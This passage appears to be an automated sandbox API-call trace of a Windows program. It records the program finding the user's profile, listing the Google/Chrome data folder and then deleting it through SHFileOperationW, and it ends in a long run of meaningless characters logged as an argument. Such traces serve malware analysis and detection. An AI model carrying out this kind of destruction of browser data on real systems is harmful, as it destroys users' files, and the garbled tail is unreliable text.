lpsz="A170020032E") returned 0xb [0157.647] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.647] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0157.647] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.647] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.647] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0157.647] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.647] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0157.647] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.647] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.647] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.647] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.647] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0157.647] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0157.647] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0157.647] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0157.647] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0157.647] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.647] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.647] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.647] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.647] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.647] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.647] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0157.647] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.647] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0157.648] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.648] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.648] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0157.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7140, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0157.648] CryptReleaseContext (hProv=0x9be890, dwFlags=0x0) returned 1 [0157.648] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.648] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.648] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.648] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.648] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.648] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0157.648] FreeLibrary (hLibModule=0x76390000) returned 1 [0157.648] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.648] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.648] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.648] CloseHandle (hObject=0x4e0) returned 1 [0157.649] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.649] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.650] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0157.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0157.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0157.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa690 [0157.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0157.650] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0157.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0157.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0157.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0157.650] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Google", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpFilePart=0x8cedf4*="Google") returned 0x24 [0157.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eac38 | out: hHeap=0x2af0000) returned 1 [0157.651] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Google" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\google")) returned 0x10 [0157.651] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Google\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xadb6a93, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4a3bd622, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x7e3bdb64, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e1cb8 [0157.651] FindNextFileW (in: hFindFile=0x9e1cb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xadb6a93, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4a3bd622, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x7e3bdb64, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0157.651] FindNextFileW (in: hFindFile=0x9e1cb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4a3bd622, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4aa60657, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x4aa60657, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Chrome", cAlternateFileName="")) returned 1 [0157.651] FindNextFileW (in: hFindFile=0x9e1cb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xadb6a93, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xadb6a93, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xadb6a93, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="CrashReports", cAlternateFileName="CRASHR~1")) returned 1 [0157.651] FindNextFileW (in: hFindFile=0x9e1cb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xadb6a93, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xadb6a93, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xadb6a93, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="CrashReports", cAlternateFileName="CRASHR~1")) returned 0 [0157.651] FindClose (in: hFindFile=0x9e1cb8 | out: hFindFile=0x9e1cb8) returned 1 [0157.651] GetLastError () returned 0x12 [0157.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0157.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0157.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0157.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0157.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0157.663] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0157.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0157.663] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa738 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa540 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.663] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0157.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0157.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0157.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0157.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0157.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0157.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0157.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0157.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4a) returned 0x29eb210 [0157.664] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Google", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Google", lpFilePart=0x8cf650*="Google") returned 0x24 [0157.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb210 | out: hHeap=0x2af0000) returned 1 [0157.665] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Google" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\google")) returned 0x10 [0157.665] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Google", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ